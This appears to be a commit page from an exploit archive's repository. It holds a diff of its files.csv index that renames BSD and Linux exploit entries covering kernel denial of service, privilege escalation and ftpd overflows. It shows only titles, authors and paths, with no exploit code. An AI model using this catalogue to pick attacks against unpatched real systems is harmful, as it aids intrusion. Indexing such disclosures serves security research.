DB: 2017-10-24

10 new exploits FreeBSD 6.1 /dev/crypto - Local Kernel Denial of Service FreeBSD 6.1 - '/dev/crypto' Local Kernel Denial of Service NetBSD FTPd / Tnftpd - Remote Stack Overflow (PoC) NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC) FreeBSD 6/8 - ata device Local Denial of Service FreeBSD 6/8 - ata Device Local Denial of Service FreeBSD 7.2 - pecoff executable Local Denial of Service FreeBSD 7.2 - 'pecoff' Local Denial of Service FreeBSD / OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service FreeBSD / OpenBSD - 'ftpd' Null Pointer Dereference Denial of Service FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off-By-One (PoC) FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC) FreeBSD Kernel - 'mountnfs()' Exploit FreeBSD - 'mountnfs()' Exploit FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition FreeBSD 8.1/7.3 - 'vm.pmap' Local Race Condition Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service BSD/Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service FreeBSD 3.0/3.1/3.2 - 'vfs_cache' Denial of Service FreeBSD Kernel - SCTP Remote NULL Ptr Dereference Denial of Service FreeBSD - SCTP Remote NULL Ptr Dereference Denial of Service OpenBSD 3.3/3.4 sysctl - Local Denial of Service OpenBSD 3.3/3.4 - 'sysctl' Local Denial of Service FreeBSD 9.1 ftpd - Remote Denial of Service FreeBSD 9.1 - 'ftpd' Remote Denial of Service FreeBSD 6.0/6.1 Ftrucante - Local Denial of Service FreeBSD 6.0/6.1 - Ftrucante Local Denial of Service NetBSD 3.1 FTPd / Tnftpd - Port Remote Buffer Overflow NetBSD 3.1 - 'FTPd / Tnftpd' Port Remote Buffer Overflow Multiple BSD Distributions - 'strfmon()' Integer Overflow BSD (Multiple Distributions) - 'strfmon()' Integer Overflow Multiple BSD Distributions - 'gdtoa/misc.c' Memory Corruption BSD (Multiple Distributions) - 'gdtoa/misc.c' Memory Corruption Multiple BSD Distributions - 'printf(3)' Memory Corruption BSD (Multiple Distributions) - 'printf(3)' Memory Corruption FreeBSD Kernel - Multiple Vulnerabilities FreeBSD - Multiple Vulnerabilities FreeBSD 10.2 Kernel (x64) - 'amd64_set_ldt' Heap Overflow FreeBSD 10.2 (x64) - 'amd64_set_ldt' Heap Overflow ArGoSoft Mini Mail Server 1.0.0.2 - Denial of Service FreeBSD 3.5.1/4.2 - ports package xklock Privilege Escalation FreeBSD 3.5.1/4.2 - Ports Package elvrec Privilege Escalation FreeBSD 3.5.1/4.2 - Ports Package 'xklock' Privilege Escalation FreeBSD 3.5.1/4.2 - Ports Package 'elvrec' Privilege Escalation OpenBSD ftp - Exploit OpenBSD - 'ftp' Exploit FreeBSD /usr/bin/top - Format String FreeBSD - '/usr/bin/top' Format String FreeBSD 4.x / < 5.4 - master.passwd Disclosure FreeBSD 4.x / < 5.4 - 'master.passwd' Disclosure FreeBSD mcweject 0.9 (eject) - Buffer Overflow Privilege Escalation FreeBSD mcweject 0.9 'Eject' - Buffer Overflow Privilege Escalation Oracle 10g - CTX_DOC.MARKUP SQL Injection Oracle 10g - 'CTX_DOC.MARKUP' SQL Injection FreeBSD 6x/7 protosw Kernel - Privilege Escalation FreeBSD 6x/7 - 'protosw' Privilege Escalation FreeBSD 7.0-RELEASE Telnet Daemon - Privilege Escalation FreeBSD 7.0-RELEASE - Telnet Daemon Privilege Escalation FreeBSD 7.0/7.1 - 'ktimer' Kernel Privilege Escalation FreeBSD 7.0/7.1 - 'ktimer' Privilege Escalation FreeBSD 7.0/7.1 vfs.usermount - Privilege Escalation FreeBSD 7.0/7.1 - 'vfs.usermount' Privilege Escalation Multiple BSD Distributions - 'setusercontext()' Vulnerabilities BSD (Multiple Distributions) - 'setusercontext()' Vulnerabilities FreeBSD Kernel - 'nfs_mount()' Exploit FreeBSD - 'nfs_mount()' Exploit FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit FreeBSD 5.4-RELEASE ftpd 6.00LS - 'sendfile' Memory Leak Exploit Sun Solaris 7.0 sdtcm_convert - Exploit Sun Solaris 7.0 - 'sdtcm_convert' Exploit BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (2) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (3) BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin Exploit BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (1) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (2) BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (3) BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Exploit NetBSD 1.3.2 / SGI IRIX 6.5.1 at(1) - Exploit NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Exploit Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (1) Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (2) Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (1) Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (2) BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (1) BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (2) BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (1) BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (2) BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon Exploit FreeBSD 3.3 gdc - Buffer Overflow FreeBSD 3.3 gdc - Symlink Exploit FreeBSD 3.3 - Seyon setgid dialer FreeBSD 3.3 xmindpath - Buffer Overflow FreeBSD 3.3 angband - Buffer Overflow FreeBSD 3.3 - 'gdc' Buffer Overflow FreeBSD 3.3 - 'gdc' Symlink Exploit FreeBSD 3.3 - Seyon setgid Dialer FreeBSD 3.3 - 'xmindpath' Buffer Overflow FreeBSD 3.3 - 'angband' Buffer Overflow FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu - Exploit FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Exploit BSD mailx 8.1.1-10 - Buffer Overflow (1) BSD mailx 8.1.1-10 - Buffer Overflow (2) BSD 'mailx' 8.1.1-10 - Buffer Overflow (1) BSD 'mailx' 8.1.1-10 - Buffer Overflow (2) OpenBSD 2.x - fstat Format String OpenBSD 2.x - 'fstat' Format String BSD lpr 0.54 -4 - Arbitrary Command Execution BSD 'lpr' 0.54 -4 - Arbitrary Command Execution FreeBSD 3.5/4.x /usr/bin/top - Format String FreeBSD 3.5/4.x - '/usr/bin/top' Format String Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2) BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1) BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2) BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1) BSD Kernel - SHMAT System Call Privilege Escalation BSD - SHMAT System Call Privilege Escalation Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Privilege Escalation FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Privilege Escalation NetBSD mail.local(8) - Privilege Escalation (Metasploit) NetBSD - 'mail.local(8)' Privilege Escalation (Metasploit) OpenBSD 3.9/4.0 - ld.so Local Environment Variable Clearing OpenBSD 3.9/4.0 - 'ld.so' Local Environment Variable Clearing FreeBSD 7.1 libc - Berkley DB Interface Uninitialized Memory Local Information Disclosure FreeBSD 7.1 - libc Berkley DB Interface Uninitialized Memory Local Information Disclosure Apple Mac OSX 10.10 - DYLD_PRINT_TO_FILE Privilege Escalation Apple Mac OSX 10.10 - 'DYLD_PRINT_TO_FILE' Privilege Escalation Apple Mac OSX 10.10.5 - XNU Privilege Escalation Apple Mac OSX 10.10.5 - 'XNU' Privilege Escalation Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation Apple Mac OSX 10.9.5/10.10.5 - rsh/libmalloc Privilege Escalation (Metasploit) Apple Mac OSX 10.9.5/10.10.5 - 'rsh/libmalloc' Privilege Escalation (Metasploit) NetBSD mail.local(8) - Privilege Escalation (NetBSD-SA2016-006) NetBSD - 'mail.local(8)' Privilege Escalation Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Local Privilege Escalation Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Privilege Escalation Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' / 'SO_RCVBUFFORCE' Privilege Escalation Linux Kernel 3.x (Ubuntu 14.04 / Mint 17.3 / Fedora 22) - Double-free usb-midi SMEP Privilege Escalation Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Local Privilege Escalation Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Local Privilege Escalation Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Local Privilege Escalation Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap Stack Clash' Privilege Escalation Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64 Stack Clash' Privilege Escalation Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic Stack Clash' Privilege Escalation Linux Kernel 4.14.0-rc4+ - 'waitid()' Privilege Escalation BSD TelnetD - Remote Command Execution (1) BSD - 'TelnetD' Remote Command Execution (1) ftpd / ProFTPd (FreeBSD) - Remote Command Execution FreeBSD - 'ftpd / ProFTPd' Remote Command Execution FreeBSD Telnet Service - Encryption Key ID Buffer Overflow (Metasploit) FreeBSD - Telnet Service Encryption Key ID Buffer Overflow (Metasploit) BSD 4.2 fingerd - Buffer Overflow BSD 4.2 - 'fingerd' Buffer Overflow BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (1) BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - amd Buffer Overflow (2) BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (1) BSD/OS 3.1/4.0.1 / FreeBSD 3.0/3.1/3.2 / RedHat Linux 6.0 - 'amd' Buffer Overflow (2) BSD TelnetD - Remote Command Execution (2) BSD - 'TelnetD' Remote Command Execution (2) FreeBSD 3.x/4.x - ipfw Filtering Evasion FreeBSD 3.x/4.x - 'ipfw' Filtering Evasion FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x FTPd - 'glob()' Buffer Overflow FreeBSD 4.2-stable FTPd - 'glob()' Buffer Overflow Vulnerabilities FreeBSD 2.2-4.2 / NetBSD 1.2-4.5 / OpenBSD 2.x - FTPd 'glob()' Buffer Overflow FreeBSD 4.2-stable - FTPd 'glob()' Buffer Overflow Vulnerabilities Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - TelnetD Buffer Overflow Solaris 2.x/7.0/8 / IRIX 6.5.x / OpenBSD 2.x / NetBSD 1.x / Debian 3 / HP-UX 10 - 'TelnetD' Buffer Overflow NetBSD 1.x TalkD - User Validation NetBSD 1.x - 'TalkD' User Validation tnftp - clientside BSD Exploit tnftp (FreeBSD 8/9/10) - 'tnftp' Client Eide Exploit Ayukov NFTP FTP Client < 2.0 - Buffer Overflow Unitrends UEB 9 - http api/storage Remote Root (Metasploit) Unitrends UEB 9 - bpserverd Authentication Bypass Remote Command Execution (Metasploit) Polycom - Command Shell Authorization Bypass (Metasploit) Joomla! Component Photo Blog alpha 3 - alpha 3a SQL Injection Joomla! Component Photo Blog alpha 3 < alpha 3a - SQL Injection cPanel 10.9 - dosetmytheme 'theme' Cross-Site Scripting cPanel 10.9 - 'dosetmytheme?theme' Cross-Site Scripting Korean GHBoard - Component/upload.jsp Unspecified Arbitrary File Upload Korean GHBoard - 'Component/upload.jsp' Unspecified Arbitrary File Upload TP-Link TL-MR3220 - Cross-Site Scripting Logitech Media Server - Cross-Site Scripting CometChat < 6.2.0 BETA 1 - Local File Inclusion Kaltura < 13.1.0 - Remote Code Execution
2017-10-24 05:02:00 +00:00 · 2017-10-24 05:02:00 +00:00 · 538da000af
commit 538da000af
parent a39d660d47
11 changed files with 1005 additions and 92 deletions
--- a/files.csv
+++ b/files.csv
@ -403,7 +403,7 @@ id,file,description,date,author,platform,type,port
 2597,platforms/multiple/dos/2597.pl,"Asterisk 1.0.12/1.2.12.1 - 'chan_skinny' Remote Heap Overflow (PoC)",2006-10-19,"Noam Rathaus",multiple,dos,0
 2625,platforms/windows/dos/2625.c,"QK SMTP 3.01 - 'RCPT TO' Remote Denial of Service",2006-10-23,"Greg Linares",windows,dos,0
 2629,platforms/windows/dos/2629.html,"Microsoft Internet Explorer - ADODB Execute Denial of Service (PoC)",2006-10-24,"YAG KOHHA",windows,dos,0
-2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 /dev/crypto - Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0
+2639,platforms/bsd/dos/2639.c,"FreeBSD 6.1 - '/dev/crypto' Local Kernel Denial of Service",2006-10-24,"Evgeny Legerov",bsd,dos,0
 2650,platforms/windows/dos/2650.c,"RevilloC MailServer 1.x - 'RCPT TO' Remote Denial of Service",2006-10-25,"Greg Linares",windows,dos,0
 2672,platforms/windows/dos/2672.py,"Microsoft Windows - NAT Helper Components 'ipnathlp.dll' Remote Denial of Service",2006-10-28,h07,windows,dos,0
 2682,platforms/windows/dos/2682.pl,"Microsoft Windows - NAT Helper Components Remote Denial of Service (Perl)",2006-10-30,x82,windows,dos,0
@ -422,7 +422,7 @@ id,file,description,date,author,platform,type,port
 2857,platforms/multiple/dos/2857.php,"PHP 4.4.4/5.1.6 - 'htmlentities()' Local Buffer Overflow (PoC)",2006-11-27,"Nick Kezhaya",multiple,dos,0
 2860,platforms/windows/dos/2860.c,"Quintessential Player 4.50.1.82 - Playlist Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos,0
 2861,platforms/windows/dos/2861.c,"Songbird Media Player 0.2 - Format String Denial of Service (PoC)",2006-11-28,"Greg Linares",windows,dos,0
-2874,platforms/bsd/dos/2874.pl,"NetBSD FTPd / Tnftpd - Remote Stack Overflow (PoC)",2006-11-30,kingcope,bsd,dos,0
+2874,platforms/bsd/dos/2874.pl,"NetBSD - 'FTPd / Tnftpd' Remote Stack Overflow (PoC)",2006-11-30,kingcope,bsd,dos,0
 2879,platforms/windows/dos/2879.py,"Microsoft Windows - spoolss GetPrinterData() Remote Denial of Service",2006-12-01,h07,windows,dos,0
 2892,platforms/linux/dos/2892.py,"F-Prot AntiVirus 4.6.6 - 'ACE' Denial of Service",2006-12-04,"Evgeny Legerov",linux,dos,0
 2893,platforms/linux/dos/2893.py,"F-Prot AntiVirus 4.6.6 - CHM Heap Overflow (PoC)",2006-12-04,"Evgeny Legerov",linux,dos,0
@ -1099,7 +1099,7 @@ id,file,description,date,author,platform,type,port
 9124,platforms/windows/dos/9124.pl,"Playlistmaker 1.5 - '.m3u' / '.M3L' / '.TXT' Local Stack Overflow (PoC)",2009-07-11,"ThE g0bL!N",windows,dos,0
 9131,platforms/windows/dos/9131.py,"Tandberg MXP F7.0 - 'USER' Remote Buffer Overflow (PoC)",2009-07-13,otokoyama,windows,dos,0
 9133,platforms/windows/dos/9133.pl,"ScITE Editor 1.72 - Local Crash",2009-07-13,prodigy,windows,dos,0
-9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - ata device Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0
+9134,platforms/freebsd/dos/9134.c,"FreeBSD 6/8 - ata Device Local Denial of Service",2009-07-13,"Shaun Colley",freebsd,dos,0
 9139,platforms/windows/dos/9139.pl,"JetAudio 7.5.3 COWON Media Center - '.wav' Crash",2009-07-14,prodigy,windows,dos,0
 9141,platforms/windows/dos/9141.pl,"Icarus 2.0 - '.ICP' Local Stack Overflow (PoC)",2009-07-14,"ThE g0bL!N",windows,dos,0
 9147,platforms/windows/dos/9147.pl,"MixVibes Pro 7.043 - '.vib' Local Stack Overflow (PoC)",2009-07-14,hack4love,windows,dos,0
@ -1118,7 +1118,7 @@ id,file,description,date,author,platform,type,port
 9192,platforms/windows/dos/9192.pl,"Soritong MP3 Player 1.0 - 'SKIN' Local Stack Overflow (PoC) (SEH)",2009-07-17,"ThE g0bL!N",windows,dos,0
 9198,platforms/multiple/dos/9198.txt,"Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities",2009-07-17,"Core Security",multiple,dos,0
 9200,platforms/windows/dos/9200.pl,"EpicVJ 1.2.8.0 - '.mpl' / '.m3u' Local Heap Overflow (PoC)",2009-07-20,hack4love,windows,dos,0
-9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - pecoff executable Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0
+9206,platforms/freebsd/dos/9206.c,"FreeBSD 7.2 - 'pecoff' Local Denial of Service",2009-07-20,"Shaun Colley",freebsd,dos,0
 9212,platforms/windows/dos/9212.pl,"Acoustica MP3 Audio Mixer 2.471 - '.sgp' Crash",2009-07-20,prodigy,windows,dos,0
 9213,platforms/windows/dos/9213.pl,"Acoustica MP3 Audio Mixer 2.471 - '.m3u' Local Heap Overflow (PoC)",2009-07-20,"D3V!L FUCK3R",windows,dos,0
 9220,platforms/windows/dos/9220.pl,"KMplayer 2.9.4.1433 - '.srt' Local Buffer Overflow (PoC)",2009-07-20,b3hz4d,windows,dos,0
@ -1425,7 +1425,7 @@ id,file,description,date,author,platform,type,port
 11652,platforms/windows/dos/11652.py,"TopDownloads MP3 Player 1.0 - '.m3u' Crash Exploit",2010-03-07,l3D,windows,dos,0
 11669,platforms/windows/dos/11669.py,"JAD java Decompiler 1.5.8g - 'argument' Local Crash",2010-03-09,l3D,windows,dos,0
 11670,platforms/windows/dos/11670.py,"JAD java Decompiler 1.5.8g - '.class' Stack Overflow Denial of Service",2010-03-09,l3D,windows,dos,0
-11705,platforms/multiple/dos/11705.c,"FreeBSD / OpenBSD 'ftpd' - Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0
+11705,platforms/multiple/dos/11705.c,"FreeBSD / OpenBSD - 'ftpd' Null Pointer Dereference Denial of Service",2010-03-12,kingcope,multiple,dos,0
 11706,platforms/windows/dos/11706.py,"Media Player classic StatsReader - '.stats' Stack Buffer Overflow (PoC)",2010-03-12,ITSecTeam,windows,dos,0
 11714,platforms/windows/dos/11714.py,"Mackeitone Media Player - '.m3u' Stack Buffer Overflow",2010-03-13,ITSecTeam,windows,dos,0
 11717,platforms/multiple/dos/11717.php,"PHP (Multiple Functions) - Local Denial of Service Vulnerabilities",2010-03-13,"Yakir Wizman",multiple,dos,0
@ -1566,7 +1566,7 @@ id,file,description,date,author,platform,type,port
 12751,platforms/windows/dos/12751.pl,"Adobe Photoshop CS4 Extended 11.0 - '.ABR' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0
 12752,platforms/windows/dos/12752.c,"Adobe Photoshop CS4 Extended 11.0 - '.GRD' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0
 12753,platforms/windows/dos/12753.c,"Adobe Photoshop CS4 Extended 11.0 - '.ASL' File Handling Remote Buffer Overflow (PoC)",2010-05-26,LiquidWorm,windows,dos,0
-12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 ftpd (FreeBSD-SA-10:05) - Off-By-One (PoC)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0
+12762,platforms/freebsd/dos/12762.txt,"FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)",2010-05-27,"Maksymilian Arciemowicz",freebsd,dos,0
 12774,platforms/windows/dos/12774.py,"Home FTP Server 1.10.3 (build 144) - Denial of Service",2010-05-28,Dr_IDE,windows,dos,0
 12775,platforms/multiple/dos/12775.py,"VideoLAN VLC Media Player 1.0.6 - '.avi' Media File Crash (PoC)",2010-05-28,Dr_IDE,multiple,dos,0
 12816,platforms/windows/dos/12816.py,"ZipExplorer 7.0 - '.zar' Denial of Service",2010-05-31,TecR0c,windows,dos,0
@ -1603,7 +1603,7 @@ id,file,description,date,author,platform,type,port
 13958,platforms/windows/dos/13958.txt,"Sysax Multi Server < 5.25 (SFTP Module) - Multiple Commands Denial of Service Vulnerabilities",2010-06-21,leinakesi,windows,dos,0
 13959,platforms/windows/dos/13959.c,"TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities",2010-06-21,"Luigi Auriemma",windows,dos,9987
 13965,platforms/windows/dos/13965.py,"Subtitle Translation Wizard 3.0.0 - Exploit (SEH) (PoC)",2010-06-22,blake,windows,dos,0
-14003,platforms/freebsd/dos/14003.c,"FreeBSD Kernel - 'mountnfs()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0
+14003,platforms/freebsd/dos/14003.c,"FreeBSD - 'mountnfs()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,dos,0
 14010,platforms/novell/dos/14010.txt,"Novell iManager - Multiple Vulnerabilities",2010-06-24,"Core Security Technologies",novell,dos,48080
 14012,platforms/multiple/dos/14012.txt,"Weborf HTTP Server - Denial of Service",2010-06-24,Crash,multiple,dos,80
 14032,platforms/windows/dos/14032.pl,"Winstats - '.fma' Local Buffer Overflow (PoC)",2010-06-24,Madjix,windows,dos,0
@ -1707,7 +1707,7 @@ id,file,description,date,author,platform,type,port
 14928,platforms/novell/dos/14928.py,"Novell Netware - NWFTPD RMD/RNFR/DELE Argument Parsing Buffer Overflow",2010-09-07,Abysssec,novell,dos,0
 14937,platforms/windows/dos/14937.py,"QQPlayer 2.3.696.400p1 - '.wav' Denial of Service",2010-09-07,s-dz,windows,dos,0
 14938,platforms/windows/dos/14938.txt,"Internet Download Accelerator 5.8 - Remote Buffer Overflow (PoC)",2010-09-07,eidelweiss,windows,dos,0
-14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - vm.pmap Kernel Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0
+14947,platforms/bsd/dos/14947.txt,"FreeBSD 8.1/7.3 - 'vm.pmap' Local Race Condition",2010-09-08,"Maksymilian Arciemowicz",bsd,dos,0
 14949,platforms/windows/dos/14949.py,"Mozilla Firefox 3.6.3 - XSLT Sort Remote Code Execution",2010-09-09,Abysssec,windows,dos,0
 14967,platforms/windows/dos/14967.txt,"Webkit (Apple Safari < 4.1.2/5.0.2 / Google Chrome < 5.0.375.125) - Memory Corruption",2010-09-10,"Jose A. Vazquez",windows,dos,0
 14971,platforms/windows/dos/14971.py,"Microsoft Word 2007 SP2 - sprmCMajority Buffer Overflow",2010-09-11,Abysssec,windows,dos,0
@ -2291,7 +2291,7 @@ id,file,description,date,author,platform,type,port
 19414,platforms/windows/dos/19414.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (2)",1999-07-03,klepto,windows,dos,0
 19415,platforms/windows/dos/19415.c,"Microsoft Windows 95/98 / NT Enterprise Server 4.0 SP5 / NT Terminal Server 4.0 SP4 / NT Workstation 4.0 SP5 - Denial of Service (3)",1999-04-06,"Rob Mosher",windows,dos,0
 19416,platforms/windows/dos/19416.c,"Netscape Enterprise Server 3.6 - SSL Buffer Overflow Denial of Service",1999-07-06,"Arne Vidstrom",windows,dos,0
-19423,platforms/bsd/dos/19423.c,"Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0
+19423,platforms/bsd/dos/19423.c,"BSD/Linux Kernel 2.3 (BSD/OS 4.0 / FreeBSD 3.2 / NetBSD 1.4) - Shared Memory Denial of Service",1999-07-15,"Mike Perry",bsd,dos,0
 19436,platforms/hardware/dos/19436.txt,"Check Point Software Firewall-1 3.0/1 4.0 - Table Saturation Denial of Service",1999-07-29,"Lance Spitzner",hardware,dos,0
 19441,platforms/hardware/dos/19441.c,"Network Associates Gauntlet Firewall 5.0 - Denial of Service",1999-07-30,"Mike Frantzen",hardware,dos,0
 19445,platforms/windows/dos/19445.txt,"Microsoft FrontPage Personal Web Server 1.0 - PWS Denial of Service",1999-08-08,Narr0w,windows,dos,0
@ -2306,7 +2306,7 @@ id,file,description,date,author,platform,type,port
 19483,platforms/windows/dos/19483.txt,"IrfanView JLS Formats PlugIn - Heap Overflow",2012-06-30,"Joseph Sheridan",windows,dos,0
 19488,platforms/bsd/dos/19488.c,"FreeBSD 5.0 / NetBSD 1.4.2 / OpenBSD 2.7 - 'setsockopt()' Denial of Service",1999-09-05,"L. Sassaman",bsd,dos,0
 19489,platforms/windows/dos/19489.txt,"Microsoft Windows NT 4.0 - DCOM Server",1999-09-08,Mnemonix,windows,dos,0
-19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 vfs_cache - Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0
+19505,platforms/freebsd/dos/19505.c,"FreeBSD 3.0/3.1/3.2 - 'vfs_cache' Denial of Service",1999-09-22,"Charles M. Hannum",freebsd,dos,0
 19507,platforms/solaris/dos/19507.txt,"Solaris 7.0 - Recursive mutex_enter Remote Panic (Denial of Service)",1999-09-23,"David Brumley",solaris,dos,0
 19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - Denial of Service",1999-09-27,"Bjorn Stickler",hardware,dos,0
